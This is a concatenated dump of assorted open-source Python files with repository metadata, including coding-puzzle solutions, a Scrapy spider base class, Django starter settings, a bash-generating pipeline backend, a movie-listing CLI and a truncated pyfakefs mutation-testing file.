lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, JiraIntegration):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"c.chary@criteo.com"
] | c.chary@criteo.com |
b30391250e931a835456f54fed3840720a37cb94 | ba0a2b0d2d1534443ea34320675aadfa378457b6 | /Tree/Q776_Split BST.py | cec5e5a356eff9e2668e7a6734676b4d15d9afdc | [] | no_license | Luolingwei/LeetCode | 73abd58af116f3ec59fd6c76f662beb2a413586c | 79d4824879d0faed117eee9d99615cd478432a14 | refs/heads/master | 2021-08-08T17:45:19.215454 | 2021-06-17T17:03:15 | 2021-06-17T17:03:15 | 152,186,910 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 705 | py |
# 思路: 分成大于和小于等于v的两部分, 并且保持结构, recursive解决
# 如果v大于等于root.val, 那么左边和root都是小于等于v, split右边, 把low的部分放到root.right, 返回root和high
# 如果v小于root.val, 那么右边和root都是大于v, split左边, 把high的部分放到root.left, 返回low和root
class Solution:
    def splitBST(self, root, V: int):
        """Split a BST at value V into (subtree of values <= V, subtree of values > V)."""
        if not root:
            return None, None
        if root.val <= V:
            # root (and its whole left subtree) stays on the low side; only the
            # right subtree may still contain values greater than V.
            lower, upper = self.splitBST(root.right, V)
            root.right = lower
            return root, upper
        # root (and its whole right subtree) stays on the high side; only the
        # left subtree may still contain values less than or equal to V.
        lower, upper = self.splitBST(root.left, V)
        root.left = upper
        return lower, root
"564258080@qq.com"
] | 564258080@qq.com |
289900379592aeb4d1dacc726059621149bf2852 | c1d5c1285793660982813fd49dfb48620bc95b36 | /linode/commands/urls.py | d058c2eaa689673fe8a916325b5892033662ece2 | [
"MIT"
] | permissive | anvetsu/pylinode | 8e74330a8ae5f789cd9c4512efdc9f20aada61b9 | 3b15a153fa0528df203c0013949827ff836759f5 | refs/heads/master | 2020-04-06T14:05:39.106008 | 2018-11-14T10:06:43 | 2018-11-14T10:06:43 | 157,527,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | # -*- coding: utf-8 -*-
# Linode api urls
LINODE_CREATE = '&api_action=linode.create'
LINODE_CLONE = '&api_action=linode.clone'
LINODE_BOOT = '&api_action=linode.boot'
LINODE_LIST = '&api_action=linode.list'
LINODE_DISK_CREATE = '&api_action=linode.disk.create'
LINODE_DISK_FROM_IMAGE = '&api_action=linode.disk.createfromimage'
LINODE_IP = '&api_action=linode.ip.list'
AVAIL_DATACENTER = '&api_action=avail.datacenters'
AVAIL_DISTRIBUTION = '&api_action=avail.distributions'
AVAIL_PLANS = '&api_action=avail.linodeplans'
JOB_LIST = '&api_action=linode.job.list'
LINODE_CREATE_CONFIG = '&api_action=linode.config.create'
LINODE_UPDATE_CONFIG='&api_action=linode.config.update'
LINODE_GET_CONFIG='&api_action=linode.config.list'
LINODE_UPDATE='&api_action=linode.update'
AVAIL_IMAGE = '&api_action=image.list'
DELETE_LINODE = '&api_action=linode.delete'
| [
"anandpillai@letterboxes.org"
] | anandpillai@letterboxes.org |
c078b540b83093a2a0ddc11c89fb99872a7affe4 | 8db5b1d27f27d6440e6bfaebf661678f8ce016e3 | /strings/demo_string_octal.py | 8b23bdf068b3489345595bff360f3702607f5f5f | [] | no_license | rasul-sharifzade/LearnPython | 9f9f860550667117354354f4f7fee082da16dc7e | ac68c208d50a1e11cfd0ab52ae00d6baea596ce9 | refs/heads/master | 2020-12-27T06:42:38.603190 | 2020-06-28T09:01:19 | 2020-06-28T09:01:19 | 237,800,042 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | txt = "\110\145\154\154\157"
print(txt) | [
"rasul.sharifzade@gmail.com"
] | rasul.sharifzade@gmail.com |
0c172bfb2db2013120d8d28c36187938f0d125b1 | afbae53ad471e34eb9918f28cc2e27e1ade6fe93 | /vivo_public_modules/spiders/item_padding_spider.py | 4a418287c83ef08a9839f1c20550b6cb9809452d | [] | no_license | wangsanshi123/spiders | 5436431feec8d9591b1b533c7c6da261142403bd | 1b42878b694fabc65a02228662ffdf819e5dcc71 | refs/heads/master | 2020-03-19T13:49:31.161232 | 2018-06-08T09:24:10 | 2018-06-08T09:24:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,472 | py | # -*- coding: utf-8 -*-
'''
作者: 郑阔
日期: 2018.04.17
版本: 1.0
出于数据库的要求需要,我们每条记录都需要填充或者计算一些字段
需要填充的有: website_id, website_type, crawl_time等
需要计算的有: model_id, user_id, content_id, refer_id等
由于这是所有爬虫都会涉及的操作,我这里写一个爬虫基类完成完成这个操作
'''
import hashlib
import datetime
import inspect
from scrapy import Item
from scrapy import Spider
class ItemPaddingSpider(Spider):
    '''
    Spider base class that performs the item padding; the point is to keep
    this logic in one place instead of each project member writing their own.
    '''

    def __init__(self, name=None, **kwargs):
        '''
        Declares in the initializer which fields each computed *_id field
        depends on.

        :param self: the object itself
        :param name: scrapy passes the `name` attribute in here
        :param kwargs: keyword arguments, used to update self.__dict__
        :return None
        '''
        super(ItemPaddingSpider, self).__init__(name, **kwargs)
        self.id_field_list = dict()
        # The order of the elements in each list is very important: a
        # different order would build a different string and therefore a
        # different hash, which would break deduplication.
        # For model_id, website_id and model_name are mandatory; when they
        # are not enough to tell two models apart, the ram and rom fields
        # must be provided as well. Items that do not need ram/rom can omit
        # those fields or set them to the empty string ''.
        self.id_field_list['model_id'] = ['website_id', 'model_name', 'ram', 'rom']
        # For user_id, website_id and user_name are mandatory.
        self.id_field_list['user_id'] = ['website_id', 'user_name']
        # For content_id, website_id and main_body are mandatory; user_name,
        # date and time depend on what the crawled website provides.
        # When time information is available, supply either date or time
        # (types datetime.date and datetime.datetime respectively).
        self.id_field_list['content_id'] = ['website_id', 'main_body', 'user_name', 'date', 'time']
        # website_id and website_type must be filled in by subclasses.
        self.website_id = None
        self.website_type = None

    def padding_item(self, item, refer_id):
        '''
        Fills in the common fields so individual spiders do not have to set
        them themselves.

        :param self: the object itself
        :param item: the item to pad; may be a dict subclass or a
            scrapy.Item subclass. Plain dicts accept new fields by
            assignment, while scrapy.Item requires a matching Field first,
            so Item instances are converted to dicts below.
        :param refer_id: refer_id is not derived from the current item; it
            identifies the content the current item depends on.
        :return: the fully padded item
        :raise: AttributeError when necessary fields such as website_type,
            website_id or user_name are missing.
        '''
        # Adding new fields to a scrapy.Item instance is cumbersome, so an
        # Item subclass instance is converted into a plain dict first.
        if Item in inspect.getmro(item.__class__):
            item = {field: item[field] for field in item}
        if not self.website_id or not self.website_type:
            raise AttributeError('Error: spider object do not have necessary attributes.')
        # Fields every record must carry.
        item['refer_id'] = refer_id
        item['crawl_time'] = datetime.datetime.now()
        item['website_type'] = self.website_type
        item['website_id'] = self.website_id
        # Check that the item contains at least one essential field.
        # Minimum condition: any one of the three fields means at least one
        # record can be inserted, because:
        #   - model info may initially exist without content or user,
        #   - user info may initially exist without content or model,
        #   - content info may initially exist without user or model.
        # Validity is therefore hard to verify automatically; team members
        # must stay alert to avoid silently dropping data.
        meet_id_condition = False
        for field in item:
            if field in ['main_body', 'user_name', 'model_name']:
                meet_id_condition = True
                break
        # If the item has none of the three essential fields there is no
        # point in storing it; raise instead of returning anything.
        if not meet_id_condition:
            raise AttributeError('Error: item does not have necessary field of database.')
        for id_field in self.id_field_list:
            # Generate model_id, user_id and content_id.
            valid_field_num = 0
            id_component = ''
            for field in self.id_field_list[id_field]:
                if field in item:
                    valid_field_num += 1
                    id_component += str(item[field])
            # At least two valid fields are required before the hash may act
            # as an *_id value, e.g.:
            #   website_id + model_name
            #   website_id + user_name
            #   website_id + main_body
            if valid_field_num > 1:
                item[id_field] = hashlib.md5(id_component.encode('utf8')).hexdigest()
        return item

    def parse(self, response):
        '''
        Parses the response.

        :param self: the object itself
        :param response: the response returned by the Scrapy framework
        :return: item
        :raise: NotImplementedError - this class is used as an abstract base
            class and is never instantiated directly.
        '''
        raise NotImplementedError
| [
"118319592@qq.com"
] | 118319592@qq.com |
2b242c84ce23da01b9930b418607811c97947727 | 2bb607a8b92cc4014d9e3e4368019a20442fd6ac | /TestRunner.py | 05a21e6e452422bb9d4f6b6da7240b9b68e9a135 | [] | no_license | 164461130/selenium-UI-Python- | 55c47d4dddf2181fb96afcb36d378428fa50681d | 2bf7e65558c825ffd0aef541a14107de27b3de10 | refs/heads/master | 2020-04-14T11:24:20.932244 | 2018-12-12T10:05:50 | 2018-12-12T10:05:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | # -*- encoding: utf-8 -*-
# @Time : 2017/12/25 14:31
# @Author : mike.liu
# @File : TestRunner.py
import unittest
from testcase.test_chromeTest import BrowserTest
if __name__ == '__main__':
    suite = unittest.TestSuite()
    # BUG FIX: the original called undefined `test_firefox('test_chrome')`
    # (only BrowserTest is imported above), which raises NameError before any
    # test runs. Both test cases must be added through BrowserTest.
    suite.addTest(BrowserTest('test_chrome'))
    suite.addTest(BrowserTest('test_firefox'))
    # Run the assembled test suite.
    runner = unittest.TextTestRunner()
    runner.run(suite)
"mike.liu@jinfuzi.com"
] | mike.liu@jinfuzi.com |
7db5a055b747a9055b13854037975cec49b0449a | 960dd60c263cea329e27584b03bb430b025fe05a | /venv/bin/gunicorn | f81ebcc4a2bdfc6d083fcd3c5c9594788335a80b | [] | no_license | RuchiBhardwaj/covid_pipeline | 18b3c0ae5836487b150ad112d86e312544d19f9d | f21a98593383caed532b9e7178e70172984cd635 | refs/heads/master | 2022-12-04T09:02:47.076901 | 2020-06-08T14:12:18 | 2020-06-08T14:12:18 | 268,835,744 | 0 | 2 | null | 2022-11-27T19:32:17 | 2020-06-02T15:17:20 | Python | UTF-8 | Python | false | false | 267 | #!/home/nineleaps/PycharmProjects/COVID19_Airflow/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
    # Strip a trailing '-script.py(w)' or '.exe' suffix from argv[0]
    # (setuptools console-script naming on Windows) before handing control
    # to gunicorn's wsgiapp entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(run())
| [
"ruchi.bhardwaj@nineleaps.com"
] | ruchi.bhardwaj@nineleaps.com | |
da7b85fc67c7bfadaab88cc1238a1038576a4cad | bdda06ffbbd49c63a84fbc3bb26a55842d2b2d0a | /mysite/settings.py | 8de5512eefee0dd550c30e69c67f04291c4e0276 | [] | no_license | todqabb/my-first-blog | f820bef4321e06b20fa1e91dc9c9c5d0aaa7cd82 | 67b4dd4b442094ba372e5e2d36fff005159850f7 | refs/heads/master | 2021-01-20T05:22:08.840767 | 2017-08-25T20:22:16 | 2017-08-25T20:22:16 | 101,439,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,200 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repository; rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = 'ko)ab0)2k5w-6vsct0j--9sp3811_gsa#l_8xe3q04c@f3u4l7'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog'
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'mysite.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'mysite.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'Europe/Budapest'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/

STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"you@example.com"
] | you@example.com |
1117dbbdc89478fcc9b3f3855a551f66657818bc | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/30/usersdata/73/9601/submittedfiles/atividade.py | ac54c0c02c33500bfc7f846ac89beb1e400e1c04 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
# Python 2 style script: input() evaluates the typed expression, so typing an
# integer yields an int. True division comes from the __future__ import above.
n = input('digite o valor de n:')
soma = 0
# Accumulate the series sum of i / (n + 1 - i) for i = 1 .. n.
for i in range(1, n + 1):
    soma += i / (n + 1 - i)
print('%.5f' % soma)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
b025942a885c51b7cba68983e10da3229b4c6dd2 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03474/s139736591.py | 35fd766d01c43ff1779773d47e9f0d978ed03fe3 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | a,b = map(int,input().split())
s = input()
digits = "0123456789"
cnt = 0
# The first `a` characters must all be digits.
for i in range(a):
    if s[i] in digits:
        cnt += 1
# The character at position `a` must be the separating '-'.
if s[a] == "-":
    cnt += 1
# The final `b` characters must all be digits.
for i in range(b):
    if s[i + a + 1] in digits:
        cnt += 1
# All a + b + 1 checks must have passed for a valid postal code.
print("Yes" if cnt == a + b + 1 else "No")
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
8d3edda1cc082f4a48eafa8db8ef84b771cd96ae | c73b9c944deb7d0c564dcefc3fe30fbf0f69e47d | /pipeline/pipeline/backend.py | 5a51e23c0d2fbe7572724f72d786690d3045cecf | [
"MIT"
] | permissive | atgenomix/hail | 46e3edcea33a86184462f6ef0f354ea0239cd0dc | ceb85fc87544b5dceabe64213e3c5acaaae6a05e | refs/heads/master | 2021-06-19T07:48:42.503150 | 2019-02-22T04:09:30 | 2019-02-22T04:09:30 | 171,826,476 | 1 | 0 | MIT | 2019-02-21T07:57:38 | 2019-02-21T07:57:37 | null | UTF-8 | Python | false | false | 2,906 | py | import abc
import os
import subprocess as sp
from .resource import Resource, ResourceGroup
from .utils import get_sha, escape_string
class Backend:
    """Abstract interface for executing a pipeline."""

    @abc.abstractmethod
    def tmp_dir(self):
        """Return a temporary working directory for a pipeline run."""
        return

    @abc.abstractmethod
    def run(self, pipeline, dry_run, verbose, bg, delete_on_exit):
        """Execute `pipeline` (or only show the plan when dry_run is set)."""
        return

    @abc.abstractmethod
    def copy(self, src, dest):
        """Return the command used to copy `src` to `dest`."""
        return
class LocalBackend(Backend):
    """Backend that renders a pipeline as a bash script and runs it locally."""

    def __init__(self, tmp_dir='/tmp/'):
        # Root under which per-run temporary directories are created.
        self._tmp_dir = tmp_dir

    def run(self, pipeline, dry_run, verbose, bg, delete_on_exit):
        """Render `pipeline` as a bash script, then execute or print it.

        Args:
            pipeline: pipeline whose tasks provide commands and resources.
            dry_run: when True, only print the generated script.
            verbose: when True, also enable bash command tracing ('-x').
            bg: backgrounding is not implemented yet (see FIXME below).
            delete_on_exit: when True, remove the temporary directory after the run.
        """
        tmpdir = self.tmp_dir()

        # BUG FIX: the original wrote `'set -e' + 'x' if verbose else ''`,
        # which parses as `('set -e' + 'x') if verbose else ''` and silently
        # drops 'set -e' for non-verbose runs. 'set -e' must always be emitted
        # so the script aborts on the first failing command.
        script = ['#!/bin/bash',
                  'set -e' + ('x' if verbose else ''),
                  '\n',
                  '# change cd to tmp directory',
                  f"cd {tmpdir}",
                  '\n']

        def define_resource(r):
            # Translate a resource (or a resource name) into a shell
            # variable definition "uid=value".
            if isinstance(r, str):
                r = pipeline._resource_map[r]
            if isinstance(r, Resource):
                assert r._value is not None
                init = f"{r._uid}={escape_string(r._value)}"
            else:
                assert isinstance(r, ResourceGroup)
                init = f"{r._uid}={escape_string(r._root)}"
            return init

        for task in pipeline._tasks:
            script.append(f"# {task._uid} {task._label if task._label else ''}")
            resource_defs = [define_resource(r) for _, r in task._resources.items()]
            if task._docker:
                # For docker tasks, resource definitions are inlined into the
                # `bash -c` command executed inside the container.
                defs = '; '.join(resource_defs) + '; ' if resource_defs else ''
                cmd = "&& ".join(task._command)
                image = task._docker
                script += [f"docker run "
                           f"-v {tmpdir}:{tmpdir} "
                           f"-w {tmpdir} "
                           f"{image} /bin/bash "
                           f"-c {escape_string(defs + cmd)}",
                           '\n']
            else:
                script += resource_defs
                script += task._command + ['\n']

        script = "\n".join(script)

        if dry_run:
            print(script)
        else:
            try:
                sp.check_output(script, shell=True)  # FIXME: implement non-blocking (bg = True)
            except sp.CalledProcessError as e:
                print(e.output)
                raise e
            finally:
                if delete_on_exit:
                    sp.run(f'rm -r {tmpdir}', shell=True)

    def tmp_dir(self):
        """Create and return a fresh, unique temporary pipeline directory."""
        def _get_random_name():
            directory = self._tmp_dir + '/pipeline.{}/'.format(get_sha(8))
            if os.path.isdir(directory):
                # Name collision with an existing run: retry with a new suffix.
                return _get_random_name()
            else:
                os.makedirs(directory, exist_ok=True)
                return directory
        return _get_random_name()

    def copy(self, src, dest):  # FIXME: symbolic links? support gsutil?
        """Return the shell command that copies `src` to `dest`."""
        return f"cp {src} {dest}"
| [
"daniel.zidan.king@gmail.com"
] | daniel.zidan.king@gmail.com |
19fadc6bd0dcb196c68d7e3ac27319302057be8f | e349a8dba0356f9ba252df905f563944750d989a | /scripts/flix.py | ea8aa9f3358bb44e41dedfe2f0bbe0bfb1387917 | [
"MIT"
] | permissive | jaebradley/flix | 49ebe12ae0b53c8c004d403d424478997085e397 | adc02c2f08d01e1acd6f18065be70a8c87e71e55 | refs/heads/master | 2022-12-12T20:15:18.697554 | 2017-06-13T12:38:17 | 2017-06-13T12:38:17 | 93,294,294 | 1 | 0 | MIT | 2022-12-07T23:58:05 | 2017-06-04T06:17:12 | Python | UTF-8 | Python | false | false | 1,547 | py | import click
from data.exceptions import InvalidDateException
from data.time import get_date
from data.services import fetch_parsed_theater_data
from tables.builders import build_table
# Accepted --month values: abbreviated month names or "1".."12" as strings.
MONTH_CHOICES = [
    "jan", "feb", "mar", "apr", "may", "jun", "jul", "aug", "sep", "oct", "nov", "dec",
    "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12"
]
# Accepted --day values: abbreviated weekday names or "1".."31" as strings.
DAY_CHOICES = ["mon", "tue", "wed", "thu", "fri", "sat", "sun",
               "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15",
               "16", "17", "18", "19", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "30", "31"]
@click.command()
@click.option("-n", "--name")
@click.option("-t", "--tomorrow", is_flag=True)
@click.option("-m", "--month", type=click.Choice(MONTH_CHOICES))
@click.option("-d", "--day", type=click.Choice(DAY_CHOICES))
@click.option("-l", "--limit", default="2", type=click.Choice(["1", "2", "3", "4", "5"]))
def flix(name, tomorrow, month, day, limit):
    # Show movie presentations for the requested date, optionally filtered
    # by movie name. (Kept as a comment, not a docstring, so click's help
    # output stays unchanged.)
    try:
        try:
            start = get_date(use_tomorrow=tomorrow, month=month, day=day)
        except InvalidDateException:
            click.echo("Invalid date inputs")
            return
        presentations = fetch_parsed_theater_data(start_date=start, movie_name=name, limit=limit)
        if presentations.movie_presentations_mapping:
            click.echo(build_table(presentations))
        else:
            click.echo("No flix found")
    except Exception:
        # Deliberate catch-all: the CLI should end with a friendly message
        # instead of a traceback.
        click.echo("Unable to show any flix")
| [
"jae.b.bradley@gmail.com"
] | jae.b.bradley@gmail.com |
2bb2717658bda0e645599dbf83db02d5fce1ebde | 3c934c97bd5748237ac8963c8be779a7d77be629 | /maximumConsecOne.py | 7c8085c860f9b9639124b62b613e6cbd31879ac1 | [] | no_license | Franktian/leetcode | 2b0d0280d18e3401b9f337f027c5d70f26237f02 | 98e7852ba144cefbdb02f705651b1519155ee4d6 | refs/heads/master | 2021-06-12T15:23:09.733650 | 2020-06-17T23:09:18 | 2020-06-17T23:09:18 | 128,710,359 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | def findMaxConsecutiveOnes(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
res = 0
curr = 0
for n in nums:
if n == 1:
curr += 1
else:
curr = 0
if curr >= res:
res = curr
return res
| [
"tianyawen201209@hotmail.com"
] | tianyawen201209@hotmail.com |
2b0c2dda599c2b9101d263bb3608cffc7638a3e8 | 757e3de38040878588bfcc846ec87a34740313a3 | /cap_07_iteracao/Lista_Fábio_03_em_for/fabio_iteracao_Q05_fatorial.py | a7ef9b3b83716cd9d39aef8b5d30c39c52b8871b | [] | no_license | Emanuelvss13/ifpi-ads-algoritimos2020 | c0a4a76ce3c41ae945f1ba31719eb68a539a9c9c | ac693feb1eee67f7c816b2ed34d44f3fd939653d | refs/heads/master | 2021-03-06T05:32:37.040171 | 2021-02-03T23:46:24 | 2021-02-03T23:46:24 | 246,182,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | def main():
numero = int(input('Digite um número: '))
fatorial = 1
numero_print =numero
for i in range(numero):
fatorial = fatorial * numero
numero -= 1
print(f'O fatorial de {numero_print} é : {fatorial}')
main() | [
"noreply@github.com"
] | Emanuelvss13.noreply@github.com |
95c86090162ab6cb8421e44e90c343841b3f6fc5 | dea198896f679e577a3fd0923e3fa4470da4b9cc | /journal/pyfakefs_mutants/AOR_BinOp_mutant_1507055069.py | eaf2e0c6399a4965c761b6dcf23493c50a49d7be | [] | no_license | naustarg/cbmcmutate | f138ab2b04b4be70d735de90815ac670ae6042ce | a6ee6fd395338bb2dfd6bdffabb2dc484cb303f1 | refs/heads/master | 2020-04-04T08:10:15.913309 | 2018-05-21T18:23:58 | 2018-05-21T18:23:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219,331 | py | # line: 91
'A fake filesystem implementation for unit testing.\n\n:Includes:\n * FakeFile: Provides the appearance of a real file.\n * FakeDirectory: Provides the appearance of a real directory.\n * FakeFilesystem: Provides the appearance of a real directory hierarchy.\n * FakeOsModule: Uses FakeFilesystem to provide a fake os module replacement.\n * FakePathModule: Faked os.path module replacement.\n * FakeFileOpen: Faked file() and open() function replacements.\n\n:Usage:\n\n>>> from pyfakefs import fake_filesystem\n>>> filesystem = fake_filesystem.FakeFilesystem()\n>>> os_module = fake_filesystem.FakeOsModule(filesystem)\n>>> pathname = \'/a/new/dir/new-file\'\n\nCreate a new file object, creating parent directory objects as needed:\n\n>>> os_module.path.exists(pathname)\nFalse\n>>> new_file = filesystem.CreateFile(pathname)\n\nFile objects can\'t be overwritten:\n\n>>> os_module.path.exists(pathname)\nTrue\n>>> try:\n... filesystem.CreateFile(pathname)\n... except IOError as e:\n... assert e.errno == errno.EEXIST, \'unexpected errno: %d\' % e.errno\n... assert e.strerror == \'File already exists in fake filesystem\'\n\nRemove a file object:\n\n>>> filesystem.RemoveObject(pathname)\n>>> os_module.path.exists(pathname)\nFalse\n\nCreate a new file object at the previous path:\n\n>>> beatles_file = filesystem.CreateFile(pathname,\n... contents=\'Dear Prudence\\nWon\\\'t you come out to play?\\n\')\n>>> os_module.path.exists(pathname)\nTrue\n\nUse the FakeFileOpen class to read fake file objects:\n\n>>> file_module = fake_filesystem.FakeFileOpen(filesystem)\n>>> for line in file_module(pathname):\n... 
print(line.rstrip())\n...\nDear Prudence\nWon\'t you come out to play?\n\nFile objects cannot be treated like directory objects:\n\n>>> os_module.listdir(pathname) #doctest: +NORMALIZE_WHITESPACE\nTraceback (most recent call last):\n File "fake_filesystem.py", line 291, in listdir\n raise OSError(errno.ENOTDIR,\nOSError: [Errno 20] Fake os module: not a directory: \'/a/new/dir/new-file\'\n\nThe FakeOsModule can list fake directory objects:\n\n>>> os_module.listdir(os_module.path.dirname(pathname))\n[\'new-file\']\n\nThe FakeOsModule also supports stat operations:\n\n>>> import stat\n>>> stat.S_ISREG(os_module.stat(pathname).st_mode)\nTrue\n>>> stat.S_ISDIR(os_module.stat(os_module.path.dirname(pathname)).st_mode)\nTrue\n'
# line: 92
import codecs
# line: 93
import errno
# line: 94
import heapq
# line: 95
import io
# line: 96
import locale
# line: 97
import platform
# line: 98
import os
# line: 99
import sys
# line: 100
import time
# line: 101
import warnings
# line: 103
from collections import namedtuple
# line: 105
import stat
# line: 106
from copy import copy
# line: 108
__pychecker__ = 'no-reimportself'

__version__ = '3.3'

# Permission bits (decimal values of the usual octal constants).
PERM_READ = 256  # 0o400
PERM_WRITE = 128  # 0o200
PERM_EXE = 64  # 0o100
PERM_DEF = 511  # 0o777
PERM_DEF_FILE = 438  # 0o666
PERM_ALL = 4095  # 0o7777

# Flags describing the behavior of a file open() mode string.
_OpenModes = namedtuple('open_modes', 'must_exist can_read can_write truncate append must_not_exist')

_OPEN_MODE_MAP = {'r': (True, True, False, False, False, False), 'w': (False, False, True, True, False, False), 'a': (False, False, True, False, True, False), 'r+': (True, True, True, False, False, False), 'w+': (False, True, True, True, False, False), 'a+': (False, True, True, False, True, False), }

# Python 2 on non-Windows platforms additionally accepts the 'rw' mode.
if ((sys.version_info[0] < 3) and (sys.platform != 'win32')):
    _OPEN_MODE_MAP['rw'] = (True, True, True, False, False, False)

# Exclusive-creation ('x') modes exist from Python 3.3 on.
if (sys.version_info >= (3, 3)):
    _OPEN_MODE_MAP['x'] = (False, False, True, False, False, True)
    _OPEN_MODE_MAP['x+'] = (False, True, True, False, False, True)

# Maximum number of symlinks to resolve before giving up (platform dependent).
if sys.platform.startswith('linux'):
    _MAX_LINK_DEPTH = 40
else:
    _MAX_LINK_DEPTH = 32

FAKE_PATH_MODULE_DEPRECATION = 'Do not instantiate a FakePathModule directly; let FakeOsModule instantiate it. See the FakeOsModule docstring for details.'

# On Windows, make OSError an alias of WindowsError.
if (sys.platform == 'win32'):
    OSError = WindowsError
# line: 160
class FakeLargeFileIoException(Exception):
    """Raised on unsupported content operations for fake large files.

    Fake large files carry only a size, not real content, so read and
    write access is not supported.
    """

    def __init__(self, file_path):
        message = ('Read and write operations not supported for '
                   'fake large file: %s' % file_path)
        super(FakeLargeFileIoException, self).__init__(message)
# line: 171
def CopyModule(old):
    """Recompiles and creates new module object."""
    module_name = old.__name__
    # Temporarily remove the cached module so __import__ re-executes it,
    # then restore the cache entry exactly as it was (even if it was absent,
    # matching the original behavior of writing the popped value back).
    previous = sys.modules.pop(module_name, None)
    fresh_copy = __import__(module_name)
    sys.modules[module_name] = previous
    return fresh_copy
# line: 179
class _FakeStatResult(object):
    """Mimics os.stat_result for use as return type of `stat()` and similar.
    This is needed as `os.stat_result` has no possibility to set
    nanosecond times directly.
    """
    # Python 2 needs `long` for nanosecond timestamps; Python 3 ints are unbounded.
    long_type = (long if (sys.version_info < (3,)) else int)

    def __init__(self, initial_time=None):
        # use_float decides whether second-resolution times are reported as
        # float or int (see FakeOsModule.stat_float_times, defined later in
        # the file).
